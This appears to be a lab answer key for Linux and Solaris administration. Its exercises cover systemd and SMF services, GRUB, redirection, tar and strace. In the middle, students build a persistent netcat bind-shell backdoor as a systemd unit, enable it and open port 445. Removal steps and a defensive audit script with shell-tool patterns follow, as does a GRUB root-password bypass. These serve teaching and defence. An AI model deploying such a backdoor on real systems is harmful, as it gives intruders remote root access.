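  printf 'ERROR: disk full\n' > "$root/var/log/messages.log"   # fresh, matches *.log
  printf 'ok\n' > "$root/var/log/old.log"
  touch -d '1999-12-31 23:59:59' "$root/var/log/old.log"        # predates 2000
  printf '#!/bin/sh\nid\n' > "$root/usr/bin/getUID"
  chmod 4755 "$root/usr/bin/getUID"                             # SUID, owned by the caller
  printf '#!/bin/sh\n' > "$root/tmp/.hidden"
  chmod 755 "$root/tmp/.hidden"
  echo "$root"
}

# *.log regular files under var modified in the last 7 days (the exercise's criteria).
count_recent_logs() { find "$1/var" -type f -name '*.log' -mtime -7 | wc -l | tr -d ' '; }

# Files whose mtime is before 2000-01-01 (! -newermt is the same as -not -newermt).
count_before_2000() { find "$1" -type f ! -newermt '2000-01-01' | wc -l | tr -d ' '; }

# SUID files owned by the caller; -user root is what the exercise asks for on a real host.
list_suid() { find "$1" -type f -perm -4000 -user "$(id -un)" -printf '%f\n'; }

# The find | xargs grep pipeline, NUL-separated so odd file names cannot break it.
grep_errors() {
  find "$1" -type f -name '*log*' -print0 | xargs -0 grep -il error | wc -l | tr -d ' '
}

# Who a process running this file gets as its effective user: the owner when
# the SUID bit is set together with the execute bit (a lowercase s), else the caller.
effective_owner() {
  mode=$(stat -c %A "$1"); owner=$(stat -c %U "$1")
  case "$mode" in
    ???s*) echo "$owner" ;;
    *)     id -un ;;
  esac
}

root=$(build_tree)
echo "recent logs:     $(count_recent_logs "$root")"   # 1 (messages.log)
echo "before 2000:     $(count_before_2000 "$root")"   # 1 (old.log)
echo "suid files:      $(list_suid "$root")"           # getUID
echo "logs with error: $(grep_errors "$root")"         # 1
echo "getUID runs as:  $(effective_owner "$root/usr/bin/getUID")"
rm -rf "$root"
```

Running the same functions against / instead of the scratch root gives the answers the exercises ask for; add `-xdev` to stay on one file system and `nice`/`ionice` as in the exercise above when the host is busy.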
Run the following commands on the CentOS machine to decompress the initrd file:
# cd ~
# mkdir initrd_ex
# cd initrd_ex
# cp /boot/initramfs-3.10.0-693.el7.x86_64.img ./initramfs.img
# mkdir contents
# cd contents
# /usr/lib/dracut/skipcpio ../initramfs.img | gunzip | cpio -id
How many binaries are available in the initramfs, that is, before the real root file system is mounted? (The kernel is already running at this point; it unpacks the initramfs into memory and runs its early user space from there.)
The following output contains all the binaries that are available at that stage.
# cd ~/initrd_ex/contents/bin
# ls | wc -l
59
# ls -l
total 7148
lrwxrwxrwx. 1 root root 4 Nov 2 17:32 awk -> gawk
-rwxr-xr-x. 1 root root 960608 Nov 2 17:32 bash
-rwxr-xr-x. 1 root root 54080 Nov 2 17:32 cat
-rwxr-xr-x. 1 root root 155168 Nov 2 17:32 cp
-rwxr-xr-x. 1 root root 49640 Nov 2 17:32 dmesg
-rwxr-xr-x. 1 root root 2714 Nov 2 17:32 dracut-cmdline
-rwxr-xr-x. 1 root root 422 Nov 2 17:32 dracut-cmdline-ask
-rwxr-xr-x. 1 root root 1342 Nov 2 17:32 dracut-emergency
-rwxr-xr-x. 1 root root 2223 Nov 2 17:32 dracut-initqueue
-rwxr-xr-x. 1 root root 1170 Nov 2 17:32 dracut-mount
-rwxr-xr-x. 1 root root 622 Nov 2 17:32 dracut-pre-mount
-rwxr-xr-x. 1 root root 1175 Nov 2 17:32 dracut-pre-pivot
-rwxr-xr-x. 1 root root 588 Nov 2 17:32 dracut-pre-trigger
-rwxr-xr-x. 1 root root 1523 Nov 2 17:32 dracut-pre-udev
-rwxr-xr-x. 1 root root 33072 Nov 2 17:32 echo
-rwxr-xr-x. 1 root root 59680 Nov 2 17:32 findmnt
-rwxr-xr-x. 1 root root 24400 Nov 2 17:32 flock
-rwxr-xr-x. 1 root root 428584 Nov 2 17:32 gawk
-rwxr-xr-x. 1 root root 159024 Nov 2 17:32 grep
-rwxr-xr-x. 1 root root 100800 Nov 2 17:32 gzip
-rwxr-xr-x. 1 root root 483296 Nov 2 17:32 journalctl
-rwxr-xr-x. 1 root root 11424 Nov 2 17:32 kbd_mode
-rwxr-xr-x. 1 root root 150736 Nov 2 17:32 kmod
-rwxr-xr-x. 1 root root 158240 Nov 2 17:32 less
-rwxr-xr-x. 1 root root 58608 Nov 2 17:32 ln
-rwxr-xr-x. 1 root root 113128 Nov 2 17:32 loadkeys
lrwxrwxrwx. 1 root root 4 Nov 2 17:32 loginctl -> true
-rwxr-xr-x. 1 root root 117656 Nov 2 17:32 ls
-rwxr-xr-x. 1 root root 79768 Nov 2 17:32 mkdir
-rwxr-xr-x. 1 root root 63056 Nov 2 17:32 mkfifo
-rwxr-xr-x. 1 root root 67200 Nov 2 17:32 mknod
-rwsr-xr-x. 1 root root 44232 Nov 2 17:32 mount
-rwxr-xr-x. 1 root root 130344 Nov 2 17:32 mv
-rwxr-xr-x. 1 root root 66176 Nov 2 17:32 ping
-rwxr-xr-x. 1 root root 40720 Nov 2 17:32 plymouth
-rwxr-xr-x. 1 root root 100120 Nov 2 17:32 ps
-rwxr-xr-x. 1 root root 41800 Nov 2 17:32 readlink
-rwxr-xr-x. 1 root root 62864 Nov 2 17:32 rm
-rwxr-xr-x. 1 root root 76016 Nov 2 17:32 sed
-rwxr-xr-x. 1 root root 41344 Nov 2 17:32 setfont
-rwxr-xr-x. 1 root root 11488 Nov 2 17:32 setsid
lrwxrwxrwx. 1 root root 4 Nov 2 17:32 sh -> bash
-rwxr-xr-x. 1 root root 33112 Nov 2 17:32 sleep
-rwxr-xr-x. 1 root root 74904 Nov 2 17:32 stat
-rwxr-xr-x. 1 root root 70264 Nov 2 17:32 stty
-rwxr-xr-x. 1 root root 641808 Nov 2 17:32 systemctl
-rwxr-xr-x. 1 root root 283896 Nov 2 17:32 systemd-cgls
-rwxr-xr-x. 1 root root 37096 Nov 2 17:32 systemd-escape
-rwxr-xr-x. 1 root root 350176 Nov 2 17:32 systemd-run
-rwxr-xr-x. 1 root root 120560 Nov 2 17:32 systemd-tmpfiles
-rwxr-xr-x. 1 root root 154600 Nov 2 17:32 teamd
-rwxr-xr-x. 1 root root 29664 Nov 2 17:32 teamdctl
-rwxr-xr-x. 1 root root 19568 Nov 2 17:32 teamnl
-rwxr-xr-x. 1 root root 45656 Nov 2 17:32 tr
-rwxr-xr-x. 1 root root 28920 Nov 2 17:32 true
-rwxr-xr-x. 1 root root 373696 Nov 2 17:32 udevadm
-rwsr-xr-x. 1 root root 31968 Nov 2 17:32 umount
-rwxr-xr-x. 1 root root 33080 Nov 2 17:32 uname
-rwxr-xr-x. 1 root root 910136 Nov 2 17:32 vi
Which binaries need to be available in the initramfs, before the real root file system is mounted? List the binaries or the command used to view them.

# ls /root/initrd_ex/contents/bin
awk                  findmnt   mknod     systemctl
bash                 flock     mount     systemd-cgls
cat                  gawk      mv        systemd-escape
cp                   grep      ping      systemd-run
dmesg                gzip      plymouth  systemd-tmpfiles
dracut-cmdline       journalctl ps       teamd
dracut-cmdline-ask   kbd_mode  readlink  teamdctl
dracut-emergency     kmod      rm        teamnl
dracut-initqueue     less      sed       tr
dracut-mount         ln        setfont   true
dracut-pre-mount     loadkeys  setsid    udevadm
dracut-pre-pivot     loginctl  sh        umount
dracut-pre-trigger   ls        sleep     uname
dracut-pre-udev      mkdir     stat      vi
echo                 mkfifo    stty
Explain what the following command does:
# /usr/lib/dracut/skipcpio ../initramfs.img | gunzip | cpio -id

- On CentOS 7 the initramfs image is usually two concatenated cpio archives: an uncompressed early-microcode archive followed by a gzip-compressed archive holding the actual early user space. skipcpio skips the first archive and writes the remainder to standard output.
- gunzip decompresses that remainder.
- cpio -i extracts the files from the archive; -d creates the leading directories as needed.

What is the first process Solaris shows after the kernel is loaded?

# ps -elf
FS UID PID PPID C PRI NI ADDR SZ STIME TTY TIME CMD
1 T root 0 0 0 0 SY ? 0 Oct 30 ? 100:11 sched
sched (PID 0) is the kernel's scheduler shown as a process; the first user-space process it starts is init (PID 1).
What are the initial processes in SysV and SMF, respectively?

Under SysV init, init (PID 1) reads /etc/inittab and runs the rc scripts.

Under SMF, init is still PID 1, but it starts svc.startd, the SMF master restarter, which starts services according to their dependencies; sched (PID 0) sits above both as the kernel scheduler.
Examine the output of the process list to determine the file paths in which the svc.startd and svc.configd daemons are located.
Document the file paths below.
Run the following command to identify the service file paths.
# ps -elf | grep svc
/lib/svc/bin/svc.startd
/lib/svc/bin/svc.configd
What command shows you the current runlevel?
What is the current runlevel?
# who -r
. run-level 3 oct 30 12:54 3 0 S
Complete the following actions and document the syntax/commands used:

- Change to runlevel 2
- Verify the runlevel has changed
- Capture the state of the services using the svcs command to a file named s1.txt
- Capture the process list using the ps -ef command to a file named p1.txt

# init 2
# who -r
# svcs > s1.txt
# ps -ef > p1.txt
Complete the following actions and document the commands/syntax used:

- Change to runlevel 3
- Capture the state of the services using the svcs command to a file named s2.txt
- Capture the process list using the ps -ef command to a file named p2.txt
- Use the diff command to compare the contents of the services and process files
- Record how many services are running in runlevel 3 that are not running in runlevel 2

# init 3
# svcs > s2.txt
# ps -ef > p2.txt
# diff s1.txt s2.txt
# diff p1.txt p2.txt
Using the svcs command, identify how many dependencies the sendmail service has and record the syntax/command used.

# svcs -l sendmail | grep dep | wc -l


2
Start the sendmail service with the following command:
svcadm enable sendmail
Using the svcs command to identify how many processes are spawned by the sendmail service and record the syntax/command used.
# svcs -p sendmail
STATE STIME FMRI
online 8:19:53 svc:/network/smtp:sendmail
8:20:53 1071 sendmail
8:20:53 1073 sendmail

Instruction
Telnet into the sendmail server with the following command:
# telnet 127.0.0.1 25

The sendmail server will give a response. Type the following to exit telnet:
<CTRL> + ]
quit

Stop the sendmail service with the following command:


# svcadm disable sendmail
Try to telnet into the sendmail server using the following command:
# telnet 127.0.0.1 25
Record the error message given by telnet at this point.
Connection refused

Use the svcadm command to re-enable the sendmail service.

# svcadm enable sendmail

Using the svcs milestone command, identify how many system milestones are present and record the syntax/command used.

# svcs milestone* | grep milestone | wc -l


7
Change the current default milestone to single-user mode and verify the runlevel with the following commands:
# svcadm milestone svc:/milestone/single-user:default
# who -r

Answer the following questions:

- Does the system go into single-user mode?
- What is the current runlevel expected to be?
- What is the current runlevel?

Note: Changing milestones directly can leave the system in an unstable state. Milestones are not designed to be backtracked into (i.e., a system should not be switched back into single-user mode once in multi-user mode).
The system remained in run-level 3 (multi-user) instead of going to run-level 1 (single user).

Run the following command and record any change(s):


# svcadm milestone -d all
Changed the default milestone for system boot to enable all installed daemons.

Reboot the machine. Record the runlevel and milestone the machine booted into and the syntax/command used

# who -r
. run-level multi-user Nov 3 09:26 S 0 0
Change to the all milestone and document the syntax/command used.

# svcadm milestone all


What type of services start in the all milestone?

# svcs -a
The all milestone will start all enabled services.
Use the svcs command to determine whether the Apache web server is enabled for the multi-user milestone and record the syntax/command
used

# svcs | grep apache


legacy_run 10:03:37 lrc:/etc/rc3_d/S50Apache
online 10:03:35 svc:/network/cswapache2:default
# svcs | grep multi
online 10:03:37 svc:/milestone/multi-user:default
online 10:03:37 svc:/milestone/multi-user-server:default
The time when the Apache web server started is before that of multi-user and there is an indication that Apache will start up for runlevel 3.
Identify the runlevel the system is in. Change the milestones and record whether the runlevel was affected.
Run the following command when finished to return the machine to the original milestone:
# svcadm milestone -d svc:/milestone/multi-user:default
# who -r
. run-level S Nov 3 09:26 S 0 0
# svcadm milestone svc:/milestone/multi-user:default
# init 6
Yes, changing the milestones affects the runlevel.
Log on to the Solaris 10 machine EX-SOL10 (10.10.1.50) as root.
SSH into the CentOS machine EX-CENTOS7 (10.10.1.40) as intern01, then su to root.

What syntax/command was used to determine the default run level of the CentOS machine?

systemctl get-default
multi-user.target (the equivalent of run level 3)
What syntax/command shows all active services on the machine?

systemctl list-units
What syntax/command shows the status of the crond service?

systemctl status crond.service


systemctl status crond
What is the path of the unit file for the crond service?
/usr/lib/systemd/system/crond.service
What syntax/command shows the status of the sshd service?

systemctl status sshd.service


systemctl status sshd
Run the following command on the CentOS machine directly (not in the SSH connection):
# systemctl disable sshd
Did the SSH session terminate?
No, the session is still active. systemctl disable only removes the unit from the boot-time wants list; it neither stops the running daemon nor closes existing connections.

Log into the Solaris machine again and attempt another SSH session to the CentOS machine.
Explain the results of the attempt.
The connection succeeded because sshd is still running: disabling the unit does not stop the daemon, it only prevents it from starting at the
next boot. (On CentOS 7 even systemctl stop sshd leaves established sessions alive, because sshd.service uses KillMode=process and only the listening parent is killed.)

Reboot the CentOS machine using the init command in the SSH session.
What syntax/command was used?
init 6
Log into the CentOS machine and run the following command:
# systemctl status sshd
Explain what the loaded and active output lines indicate.
The loaded line shows that the unit file was found and parsed and, in the parenthesised part, that it is disabled, so it will not be started at boot.
The active line shows inactive (dead): the daemon is not currently running.
Enable the SSH service to start on boot.
What syntax/command was used?
systemctl enable sshd
Explain what the loaded and active output lines indicate using the following command:
# systemctl status sshd
The loaded line now shows the unit as enabled, so it will start at the next boot.
The active line still shows inactive (dead): enable only creates the wants symlink, it does not start the daemon (systemctl start sshd does).
Document the steps an administrator would take to change root's password on a CentOS 7 machine by editing the GRUB boot entry.
Warning: Only perform these actions on a local/physical machine (console access).
On CentOS 7 the single-user (rescue) target prompts for the root password, so the boot entry has to be edited to bypass the normal init instead:
1. At the GRUB menu, press e on the default entry and find the line beginning with linux16.
2. Change the ro option to rw and append init=/bin/bash, then boot the edited entry with Ctrl-x. The kernel now runs bash as PID 1 directly on the real root filesystem, so no chroot is needed. (The alternative is to append rd.break instead, which stops in the initramfs shell; there the root filesystem is at /sysroot and must be remounted writable and entered with mount -o remount,rw /sysroot followed by chroot /sysroot.)
3. Use the passwd command to change the root password.
4. If SELinux is enforcing, run touch /.autorelabel so that /etc/shadow is relabelled on the next boot; otherwise logins can fail afterwards.
5. Use the reboot -f command to restart the machine.
Caveat: anyone with console access can do this unless the GRUB menu is password-protected (grub2-setpassword on recent CentOS 7 releases) and the disk is encrypted, which is why physical access is treated as equivalent to root.
Use the following commands to create a persistent backdoor using netcat on the CentOS machine.
# cd /etc/systemd/system/
# vi backdoor.service
The contents of the backdoor.service file:
[Unit]
Description=Netcat backdoor daemon
Documentation=man:nc(1)
After=network.target

[Service]
Type=simple
ExecStart=/usr/bin/nc -lp 445 -e /bin/bash
Restart=always

[Install]
WantedBy=multi-user.target
Reload the daemons and enable the backdoor:
# systemctl daemon-reload
# systemctl start backdoor
# systemctl status backdoor
Allow incoming connections on port 445 through the firewall (runtime configuration only):
# firewall-cmd --add-port=445/tcp
Connect to the backdoor using the Solaris machine.
What syntax/command was used?
nc 10.10.1.40 445
Establish backdoor persistence on the CentOS machine after a restart.
What syntax/command was used?
Enable the service by using the following command:
systemctl enable backdoor
Restart the CentOS machine and try to connect to the backdoor from the Solaris Machine.
Was the connection successful?
Why or why not?
The firewall rule for port 445 was added to the runtime configuration only and was lost when the CentOS machine restarted. firewalld keeps the
runtime and permanent configurations separately: --permanent writes only the saved configuration, so to have the port open both now and after a reboot either run the command twice (with and without --permanent) or add it with --permanent and then run firewall-cmd --reload.
Disable the backdoor, stop the backdoor service, and remove any files associated with backdoor.service. Record the syntax/commands used.

systemctl disable backdoor
systemctl stop backdoor
rm /etc/systemd/system/backdoor.service
systemctl daemon-reload
firewall-cmd --remove-port=445/tcp
Note: daemon-reload is needed so that systemd forgets the deleted unit (otherwise it lingers as not-found in systemctl status), and the firewall opening has to be removed separately (with --permanent as well if it was persisted); disabling the unit does neither.
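An added example (not part of the lab) of the audit a defender would run after this exercise: it scans a systemd unit directory for ExecStart lines that launch a listener or shell relay, which is exactly how backdoor.service persists, and reports whether each flagged unit is wired into multi-user.target the way systemctl enable wires it. Run it against /etc/systemd/system on the CentOS machine; the function names are this example's own, and the pattern list is a heuristic that will miss a renamed or copied binary.

```shell
#!/bin/sh
# Added example, not part of the lab: audit a systemd unit directory for the
# kind of persistence backdoor.service creates. Flags units whose ExecStart
# runs nc/ncat/netcat/socat, passes "-e /bin/..." (exec a shell on connect)
# or uses bash's /dev/tcp, and reports whether each one is enabled.

# unit_enabled DIR NAME -> 0 if DIR/multi-user.target.wants/NAME exists,
# which is what "systemctl enable" creates for WantedBy=multi-user.target
unit_enabled() {
    [ -L "$1/multi-user.target.wants/$2" ] || [ -e "$1/multi-user.target.wants/$2" ]
}

# audit_units DIR -> prints "unit|enabled-or-disabled|ExecStart" per suspicious
# unit; returns 1 if anything was flagged, 0 if the directory looks clean
audit_units() {
    dir=$1
    flagged=0
    for unit in "$dir"/*.service; do
        [ -f "$unit" ] || continue
        exec_line=$(sed -n 's/^ExecStart=//p' "$unit" | head -n 1)
        [ -n "$exec_line" ] || continue
        # pad with spaces so the patterns match a bare "nc" as well as "/usr/bin/nc"
        case " $exec_line " in
            */nc\ *|*\ nc\ *|*/ncat\ *|*\ ncat\ *|*/netcat\ *|*\ netcat\ *|*/socat\ *|*\ socat\ *|*\ -e\ /bin/*|*/dev/tcp/*)
                name=$(basename "$unit")
                if unit_enabled "$dir" "$name"; then state=enabled; else state=disabled; fi
                printf '%s|%s|%s\n' "$name" "$state" "$exec_line"
                flagged=1 ;;
        esac
    done
    return $flagged
}

# Stand-alone run: audit the live unit directory (readable without root)
audit_units /etc/systemd/system && echo "no suspicious ExecStart lines in /etc/systemd/system"
```

Pair it with ss -ltnp to confirm nothing is actually listening on an unexpected port, and with systemctl list-unit-files --state=enabled for units that live outside /etc/systemd/system.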
This section deals with modifying grub boot options and adding a custom entry into the boot menu.
NOTE: THE FOLLOWING IS FOR INFORMATIONAL PURPOSES ONLY. DO NOT RUN THESE ON YOUR VIRTUAL MACHINE.
# vim /etc/grub.d/40_custom
The contents of the 40_custom file:
menuentry "CentOS Linux 7 Multi-User Mode" {
set root=(hd0,1)
linux /vmlinuz-3.10.0-693.5.2.el7.x86_64 root=/dev/mapper/cl-root ro systemd.unit=graphical.target text
initrd /initramfs-3.10.0-693.5.2.el7.x86_64.img
boot
}
This command will rebuild the configuration files used by grub:
# grub2-mkconfig --output=/boot/grub2/grub.cfg
In the 40_custom file, which systemd.unit target would need to be used to allow the user to boot into the multi-user target instead of the
graphical target?

multi-user.target

Which variable in the /etc/default/grub file would need to be edited in order to change the timeout from five seconds to fifteen seconds?

GRUB_TIMEOUT

Run the command below and answer the following:


# echo The rain in Spain is mostly on the plain.

 Where is echo taking its input from?


 Where is echo sending its output?
 Is echo using STDIN?
The echo command takes its input from command-line arguments.
It ignores input from STDIN and simply prints what it is given on the command line to STDOUT.
Run the command below and answer the following:

# cat

 What happens after typing "hello world" and pressing Enter?


 What happens after typing "goodbye world" and pressing Enter?
 How does the cat command process input?

Press CTRL+d to finish.


Note: The cat command takes input from STDIN and writes it to STDOUT. Notice how the terminal waits for input.
The text is repeated back every time Enter is pressed. The cat command will take what it receives from STDIN and display it to the
user.

Run the commands below and answer the following:

# cat /etc/shadow /etc/ssh/ssh_config


# cat < /etc/shadow
# echo "Hello World" > ex1

 Which syntax/command will show the contents of the file ex1?


 What is the difference between cat /etc/shadow and cat < /etc/shadow?

Note: The cat command treats command line arguments as filenames and will open the files in order and write their contents to
STDOUT. A redirection operator (>) can be used to send the output to a file instead of STDOUT.
Run the following command to show the contents of the ex1 file:

# cat /tmp/ex1
cat /etc/shadow opens the file named on its command line itself, while with cat < /etc/shadow the shell opens the file and connects it to
cat's STDIN, so cat never sees a filename (which is why errors in that form refer to '-'). The output is identical.
Run the commands below and explain what happened to the output streams:
# cat "Hello World" > ex1
# cat ex1

# cat "Hello World" > ex1


cat: Hello World: No such file or directory
Error messages generated by the cat command are displayed by using the stream STDERR. Nothing will be in the file ex1, because no
output is produced using the STDOUT stream.
# cat > ex1
Hello World<ENTER>
<CTRL> + <D>
# cat ex1

The cat command runs and waits for the user to type something. Whatever it receives on STDIN is written to ex1; the > operator truncates the file first, so this replaces its previous contents rather than appending to them.

# cat ex1
Hello World
Run the following commands and record the results:
# echo "Hello World" | cat> ex1
# cat < ex1
# cat < ex1 > ex1
# echo < ex1 > ex1
# echo ex1 >> ex1
# cat < ex1 > box
# cat < ex1 | cat >> ex1
# cat < ex1 >> ex1
<CTRL> + <C>
# echo Clean the floor & cat box
# echo "Clean the floor & cat box"

Run this same sequence of commands on the Solaris machine and note any differences.
Uses cmd line arguments as input through echo and redirects STDOUT (via pipe) to the STDIN of cat, which will then redirect STDOUT to
the ex1 file. This places the text "Hello World" into the ex1 file.

# echo "Hello World" | cat > ex1


The contents of the ex1 file are passed to STDIN of cat and displayed to the screen.

# cat < ex1


The shell sets up the redirections before cat runs: it opens ex1 for reading and then truncates it for writing, so by the time cat reads its
STDIN the file is already empty. The file ends up containing no data.

# cat< ex1 > ex1


Note: Solaris displays the following error:
# cat <ex1 > ex1
cat: input/output files '-' identical.
The content of the ex1 file (which is now empty) is passed to STDIN of echo, which in turn redirects the default output of echo (a single
newline) into the ex1file.

# echo < ex1 > ex1


Appends the STDOUT of echo to the ex1 file. The file now contains a newline and the text ex1.

# echo ex1 >> ex1


The contents of the ex1 file are passed to STDIN of cat and then redirected to create a new file named box with the same contents as
the ex1 file.

# cat < ex1 > box


The contents of the ex1 file are passed to STDIN of cat and then the STDOUT is piped to the STDIN of another cat process, which
appends the contents to the end of the ex1 file.

# cat < ex1 | cat >> ex1


The contents of the ex1 file are passed to STDIN of cat while cat is appending to the same file, so every block cat reads and writes becomes
new input and the file grows without bound until the command is interrupted with CTRL+C. (Some implementations, including GNU cat, detect that STDIN and STDOUT are the same non-empty regular file and refuse with an "input file is output file" error instead.)

# cat < ex1 >> ex1


The echo command will echo the arguments "Clean the floor" and run the process in the background. The cat command then displays
the contents of the box file.

# echo Clean the floor & cat box


The echo command will echo the string "Clean the floor & cat box" to STDOUT.

# echo "Clean the floor & cat box"


Describe what the tee command does and explain the following:

# ls -lisa | tee filelisting | less

The tee command reads from standard input and writes what it reads both to standard output and to the file(s) named as arguments, so one stream can be saved and passed on at the same time.
In the command above, ls -lisa writes the listing to STDOUT, the pipe delivers it to the STDIN of tee, tee writes a copy into the file named filelisting and passes the same data on its STDOUT to the STDIN of less, which pages it:

# ls -lisa | tee filelisting | less
Document and execute the command that will write the ls command output to a file named filelisting then display the file contents with
the less command in one line.
Note: Both & and ; cause most shells to treat what precedes the symbol as one command and what follows it as another, but they are not equivalent: ; runs the commands one after the other, while & puts the first command in the background and starts the second immediately. The first form below therefore always shows the complete listing, whereas the second may start less before ls has finished writing filelisting:

# ls -lisa > filelisting; less filelisting

# ls -lisa > filelisting & less filelisting
Create the following directory, change into it and record the syntax/command used:
/tmp/backup

Note: Tar is short for tape archive and was originally used to create backup tapes. However, it has been re-purposed as a method of
packaging a directory structure into a single file, typically called a tarball. Consult the man page for more information.
# mkdir /tmp/backup
# cd /tmp/backup

Use the tar command to create a backup of the /var/run directory named run.tar in the /tmp/backupdirectory, then extract
the run.tar backup into the /tmp/backup directory.
Answer the following:

 What syntax/command was used to create the backup?


 What syntax/command was used to extract the backup?
 What file/directory names are created in the /tmp/backup directory?

Run the following command to clean up the directory:

# rm -rf /tmp/backup/*
Note: The /var/run directory contains symbolic links (on CentOS 7, /var/run is itself a symlink to /run). By default tar stores a symlink as a link entry rather than following it; the -h option dereferences links and archives the files they point to.

# cd /tmp/backup
# tar -hcf run.tar /var/run
# tar -xvf run.tar
# ls -l
total 8600
-rw-r--r--. 1 root root 8806400 Nov 3 16:07 run.tar
drwxr-xr-x. 3 root root 17 Nov 3 16:07 var
Write a chain of commands with the ; operator to complete the following and record the syntax/command used:
 Change directory to /var/run
 Tar the contents of the /var/run directory into /tmp/backup/run.tar
 Change directory back to /tmp/backup
 Document the final command below

# cd /var/run; tar -hcvf /tmp/backup/run.tar ./; cd /tmp/backup/


Write a single command using the tar -C option that mimics the behavior of the following:

# cd /var/run; tar -hcvf /tmp/backup/run.tar ./; cd /tmp/backup/

# tar -C /var/run -hcvf /tmp/backup/run.tar .
(-C changes directory before the following file operand is read, so the archive contains the same ./ entries as the cd version, and the shell's working directory is unchanged.)


Run the following on the Solaris machine and record the results:

# tar -C /var/run -hcvf /tmp/backup/run2.tar /var/run

# tar -C /var/run -hcvf /tmp/run.tar /var/run


tar: C: unknown function modifier
Solaris tar reads its first argument as the function letter plus modifiers, and C is not one of them. It does support -C, but only inside the file list after the archive name, e.g. tar -cvhf /tmp/run.tar -C /var/run . (GNU tar accepts -C anywhere on the command line).
Using | (pipe), write a command that prints only the 12th line of the tar listing by printing the last of the first 12 lines.
Note: The tar -t option will produce a listing of the files in run.tar file. There are multiple ways to extract a specific entry. Use only the
head and tail commands.

# tar -tf run.tar | head -12 | tail -1


var/run/NetworkManager/resolv.conf
Write a single command that identifies the 12th entry from the run.tar file using command substitution.

tar -xf /tmp/backup/run.tar `tar -tf /tmp/backup/run.tar | head -12 | tail -1`


Write a single command that extracts the 12th entry from the run.tar file using command substitution on the Solaris machine and
record any differences.

tar -xf /tmp/backup/run.tar `tar -tf /tmp/backup/run.tar | head -12 | tail -1`


No differences.
The command ps -ef provides a thorough view of the processes on the system, though there is significant variation in the options
for ps across Unix flavors.
Note: Use the command-line help and man pages for more information. Search the manual pages with the syntax man -k {searchstring}.
Example:
# man -k PATH
# man -k filetype
Answer the following regarding ps and the environment for both the Solaris and CentOS machines:

 What is the location of the ps command?


 What type of file is the ps command?

CentOS

# which ps
/usr/bin/ps
#file `which ps`
/usr/bin/ps: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for
GNU/Linux 2.6.32, BuildID[sha1]=3ca95c5bfec071ba29e28124db03a693d9423904, stripped
Solaris

# which ps
/usr/bin/ps
#file `which ps`
/usr/bin/ps: ELF 32-bit LSB Executable 80386 Version 1, dynamically linked, stripped
On the CentOS machine, run the following strace commands and describe the differences:

# strace ps 1> a.txt


# strace ps 2> b.txt
The contents of the a.txt file contain the output of the ps command.
The contents of the b.txt file contain the output of the strace command.
Note: The strace command provides a detailed list of all system calls that a command makes; it is invoked by passing the command
string as an argument to the strace command. strace outputs to STDERR stream.
On the CentOS machine, run the following strace command and record the results:

# strace ps | less
Did the command work? Why or why not?
Only partly. less shows just the output of ps, because the pipe carries STDOUT and strace writes its trace to STDERR, which is not part of the pipeline and scrolls past on the terminal unpaged.
To page the trace, send STDERR into the pipe (strace ps 2>&1 | less) or write it to a file with strace -o.
Document the appropriate strace syntax to complete the following:
 Redirect the strace command output to a file named pstrace1.txt using shell redirection operators.
 Redirect the strace command output to a file named pstrace2.txt without using shell redirection operators.

With shell redirection:

# strace ps 2> pstrace1.txt


Without shell redirection:

# strace -o pstrace2.txt ps
Where in the file system is the strace command locating information for the ps command?
Note: The PID of the processes may be useful in referencing information within the pstrace1.txt file.

/proc/<PID>

# strace -o pstrace1.txt ps
PID TTY TIME CMD
13039 pts/0 00:00:00 bash
30961 pts/0 00:00:00 strace
30963 pts/0 00:00:00 ps
# cat pstrace1.txt | grep 13039
read(3, "30930 (ps) R 30928 30928 13039 3"..., 1024) = 313
stat("/proc/13039", {st_mode=S_IFDIR|0555, st_size=0, ...}) = 0
open("/proc/13039/stat", O_RDONLY) = 6
read(6, "13039 (bash) S 13031 13039 13039"..., 2048) = 356
open("/proc/13039/status", O_RDONLY) = 6
readlink("/proc/13039/fd/2", "/dev/pts/0", 127) = 10
write(1, " 13039 pts/0 00:00:00 bash\n", 30) = 30
read(6, "30928 (strace) S 13039 30928 130"..., 2048) = 331
read(6, "30930 (ps) R 30928 30928 13039 3"..., 2048) = 313
Answer the following questions regarding the pstrace1.txt file.

 What command will find all references to the user's BASH shell?
 How many lines refer to this PID?
 What system call is used to print output to the screen?
 Find all references to the user's BASH shell PID (13039 in the trace above):
# cat pstrace1.txt | grep 13039
This returns the nine lines shown in the previous answer. (Note that -o must come before the traced command: strace ps -o pstrace1.txt would pass -o to ps instead.)
Number of PID references:

# cat pstrace1.txt | grep 13039 | wc -l


9
System call used to output the PID information to the screen: write, on file descriptor 1 (STDOUT), as in the line
write(1, " 13039 pts/0 00:00:00 bash\n", 30) = 30
The read calls on descriptor 6 are ps reading /proc/<PID>/stat; only write(1, ...) reaches the terminal.
Based on the output of the following command, does the ps command use the fork or exec system call?

# cat pstrace1.txt | awk -F: '{print $1}' | sort | uniq

Note: This chain of commands shows a sorted, unique list of the system calls used by the ps command.
No. The trace contains no fork (or clone) call, only execve: the shell had already forked before strace ran, and the child then called execve to replace itself with /usr/bin/ps. ps itself never creates a child process.

# cat pstrace1.txt | awk -F '(' '{ print $1 }' | sort | uniq | grep exec
execve
# cat pstrace1.txt | grep fork
# cat pstrace1.txt | grep exec
execve("/usr/bin/ps", ["ps"], [/* 42 vars */]) = 0

Run the following command to compare the root.console and root.ssh text files:

sdiff root.ssh root.console


Search the output for the process ID and document the command/syntax used.

sdiff root.ssh root.console | grep PID


Based on the output of the previous question, what is the PPID environment variable?

The parent process ID environment variable is $PPID

Examine the process information for the current shell using the following command:

# ps -ef | grep $$
What does the $$ variable represent?
$$ expands to the PID of the current shell.

What information is reported by the consoletype command?

The type of console currently in use.

Which commands can be used to compare text files in Unix? List all that apply and record the syntax/command used.

man -k compare will list the commands.


cmp and diff (also sdiff, used above, and comm for sorted files)
Log into the CentOS machine via SSH as intern01, and dump a copy of the environment to /tmp/intern01.sh
Use the su command to switch to root and dump a copy of the environment to /tmp/root.sh
Stay logged in as root.
What is the current shell?

# echo $0
bash
# ps -ef | grep $$
root 13039 13031 0 07:19 pts/0 00:00:00 bash
root 49553 13039 0 12:07 pts/0 00:00:00 ps -ef
What is the current directory?

# pwd
/home/intern01
What is the home directory of both root and intern01 specified in their environment?

The variable for root is HOME=/root


The variable for intern01 is HOME=/home/intern01
Which directory does the following command change to?
# cd ~
# pwd
/root
Run the following and record whether it was successful:

# ifconfig -a
The command returns the interface configuration.

Identify the full path of the ifconfig command being run.

# which ifconfig
/usr/sbin/ifconfig
Which directory contains the ifconfig executable?

# which ifconfig
